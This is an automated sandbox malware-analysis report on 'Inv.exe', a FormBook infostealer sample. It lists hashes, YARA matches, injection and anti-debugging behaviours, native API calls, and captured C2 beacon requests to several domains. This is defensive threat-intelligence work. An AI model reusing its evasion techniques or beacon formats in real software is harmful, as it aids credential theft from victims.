Analysis Report Inv.exe

Overview

General Information

Sample Name: Inv.exe
Analysis ID: 339347
MD5: a3aba7d40da6c8c86e4e8d035803f314
SHA1: 469b36f05939d6ec6457f1b72ba9f6c7a960be06
SHA256: 1f94eb81e3cde4f677fd210e1ff7f5d06987cbdc2fa7de79e28b224e49244b40
Tags: exe, Formbook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Inv.exe Avira: detected
Found malware configuration
Source: 0.2.Inv.exe.d90000.1.unpack Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d6f3", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d7ed", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c373", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------",
Multi AV Scanner detection for submitted file
Source: Inv.exe Virustotal: Detection: 39%
Source: Inv.exe ReversingLabs: Detection: 45%
Yara detected FormBook
Source: Yara match File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Inv.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.Inv.exe.d90000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Inv.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: Inv.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Inv.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: Inv.exe, 00000000.00000003.670292202.000000001A590000.00000004.00000001.sdmp, Inv.exe, 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.1047189715.0000000002DF0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Inv.exe, NETSTAT.EXE
Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.685750168.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Inv.exe Code function: 4x nop then pop esi 1_2_004172FA
Source: C:\Users\user\Desktop\Inv.exe Code function: 4x nop then pop ebx 1_2_00407B05
Source: C:\Users\user\Desktop\Inv.exe Code function: 4x nop then pop edi 1_2_0040E44D
Source: C:\Users\user\Desktop\Inv.exe Code function: 4x nop then pop edi 1_2_00417D80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop esi 4_2_003672FA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop ebx 4_2_00357B05
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 4_2_0035E44D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4x nop then pop edi 4_2_00367D80

Networking:

Uses netstat to query active network connections and open ports
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1Host: www.millcityloam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1Host: www.achonabu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1Host: www.a-zsolutionsllc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1Host: www.nationshiphop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.54.117.217
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLEUS
Source: Joe Sandbox View ASN Name: SINGLEHOP-LLCUS
Source: unknown DNS traffic detected: queries for: www.millcityloam.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeX-Powered-By: PHP/5.6.40Content-Type: text/html; charset=UTF-8X-UA-Compatible: IE=edgeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abccarpetcare.com/wp-json/>; rel="https://api.w.org/"X-LiteSpeed-Cache-Control: public,max-age=3600X-LiteSpeed-Tag: 2cd_404,2cd_URL.8baa36f0385195f985698a5c3d8ac84b,2cd_ERR.404,2cd_X-Litespeed-Cache: missTransfer-Encoding: chunkedDate: Wed, 13 Jan 2021 20:27:17 GMTServer: LiteSpeed Data Ascii: 457d<!DOCTYPE html><html lang="en-US" ><he
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000002.1048019987.0000000002B50000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.692522986.000000000B976000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: Inv.exe, 00000000.00000002.673645409.0000000000A58000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Inv.exe.d90000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Inv.exe.d90000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Inv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Inv.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041A060 NtClose, 1_2_0041A060
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041A110 NtAllocateVirtualMemory, 1_2_0041A110
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00419F30 NtCreateFile, 1_2_00419F30
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00419FE0 NtReadFile, 1_2_00419FE0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0041A08A NtAllocateVirtualMemory, 1_2_0041A08A
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00419FDA NtReadFile, 1_2_00419FDA
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_00419FDC NtReadFile, 1_2_00419FDC
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019899A0 NtCreateSection,LdrInitializeThunk, 1_2_019899A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_01989910
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019898F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_019898F0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989840 NtDelayExecution,LdrInitializeThunk, 1_2_01989840
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_01989860
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_01989A00
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A20 NtResumeThread,LdrInitializeThunk, 1_2_01989A20
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A50 NtCreateFile,LdrInitializeThunk, 1_2_01989A50
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019895D0 NtClose,LdrInitializeThunk, 1_2_019895D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989540 NtReadFile,LdrInitializeThunk, 1_2_01989540
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989780 NtMapViewOfSection,LdrInitializeThunk, 1_2_01989780
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019897A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_019897A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989710 NtQueryInformationToken,LdrInitializeThunk, 1_2_01989710
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019896E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_019896E0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_01989660
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019899D0 NtCreateProcessEx, 1_2_019899D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989950 NtQueueApcThread, 1_2_01989950
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019898A0 NtWriteVirtualMemory, 1_2_019898A0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989820 NtEnumerateKey, 1_2_01989820
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198B040 NtSuspendThread, 1_2_0198B040
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198A3B0 NtGetContextThread, 1_2_0198A3B0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989B00 NtSetValueKey, 1_2_01989B00
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A80 NtOpenDirectoryObject, 1_2_01989A80
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989A10 NtQuerySection, 1_2_01989A10
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019895F0 NtQueryInformationFile, 1_2_019895F0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198AD30 NtSetContextThread, 1_2_0198AD30
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989520 NtWaitForSingleObject, 1_2_01989520
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989560 NtWriteFile, 1_2_01989560
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989FE0 NtCreateMutant, 1_2_01989FE0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198A710 NtOpenProcessToken, 1_2_0198A710
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989730 NtQueryVirtualMemory, 1_2_01989730
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989770 NtSetInformationFile, 1_2_01989770
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_0198A770 NtOpenThread, 1_2_0198A770
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989760 NtOpenProcess, 1_2_01989760
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_019896D0 NtCreateKey, 1_2_019896D0
Source: C:\Users\user\Desktop\Inv.exe Code function: 1_2_01989610 NtEnumerateValueKey, 1_2_01989610
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A50 NtCreateFile,LdrInitializeThunk, 4_2_02E59A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_02E59860
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59840 NtDelayExecution,LdrInitializeThunk, 4_2_02E59840
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E599A0 NtCreateSection,LdrInitializeThunk, 4_2_02E599A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_02E59910
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E596E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_02E596E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E596D0 NtCreateKey,LdrInitializeThunk, 4_2_02E596D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59660 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_02E59660
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59650 NtQueryValueKey,LdrInitializeThunk, 4_2_02E59650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59FE0 NtCreateMutant,LdrInitializeThunk, 4_2_02E59FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59780 NtMapViewOfSection,LdrInitializeThunk, 4_2_02E59780
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59710 NtQueryInformationToken,LdrInitializeThunk, 4_2_02E59710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E595D0 NtClose,LdrInitializeThunk, 4_2_02E595D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59540 NtReadFile,LdrInitializeThunk, 4_2_02E59540
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A80 NtOpenDirectoryObject, 4_2_02E59A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A20 NtResumeThread, 4_2_02E59A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A00 NtProtectVirtualMemory, 4_2_02E59A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59A10 NtQuerySection, 4_2_02E59A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5A3B0 NtGetContextThread, 4_2_02E5A3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59B00 NtSetValueKey, 4_2_02E59B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E598F0 NtReadVirtualMemory, 4_2_02E598F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E598A0 NtWriteVirtualMemory, 4_2_02E598A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5B040 NtSuspendThread, 4_2_02E5B040
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59820 NtEnumerateKey, 4_2_02E59820
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E599D0 NtCreateProcessEx, 4_2_02E599D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59950 NtQueueApcThread, 4_2_02E59950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59670 NtQueryInformationProcess, 4_2_02E59670
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59610 NtEnumerateValueKey, 4_2_02E59610
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E597A0 NtUnmapViewOfSection, 4_2_02E597A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59760 NtOpenProcess, 4_2_02E59760
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5A770 NtOpenThread, 4_2_02E5A770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59770 NtSetInformationFile, 4_2_02E59770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59730 NtQueryVirtualMemory, 4_2_02E59730
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5A710 NtOpenProcessToken, 4_2_02E5A710
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E595F0 NtQueryInformationFile, 4_2_02E595F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59560 NtWriteFile, 4_2_02E59560
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E59520 NtWaitForSingleObject, 4_2_02E59520
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_02E5AD30 NtSetContextThread, 4_2_02E5AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036A060 NtClose, 4_2_0036A060
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036A110 NtAllocateVirtualMemory, 4_2_0036A110
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00369F30 NtCreateFile, 4_2_00369F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00369FE0 NtReadFile, 4_2_00369FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_0036A08A NtAllocateVirtualMemory, 4_2_0036A08A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00369FDC NtReadFile, 4_2_00369FDC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 4_2_00369FDA NtReadFile, 4_2_00369FDA
Detected potential crypto function
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 0123BFC3 appears 38 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 01236EF1 appears 84 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 01239160 appears 64 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 01236F06 appears 36 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 01237021 appears 40 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 0194B150 appears 35 times
Source: C:\Users\user\Desktop\Inv.exe Code function: String function: 0123715C appears 370 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 02E1B150 appears 66 times
Sample file is different than original file name gathered from version info
Source: Inv.exe, 00000000.00000003.670693601.000000001A516000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
Source: Inv.exe, 00000001.00000002.710037557.0000000001BCF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Inv.exe
Source: Inv.exe, 00000001.00000002.709669837.00000000018F0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs Inv.exe
Uses 32bit PE files
Source: Inv.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
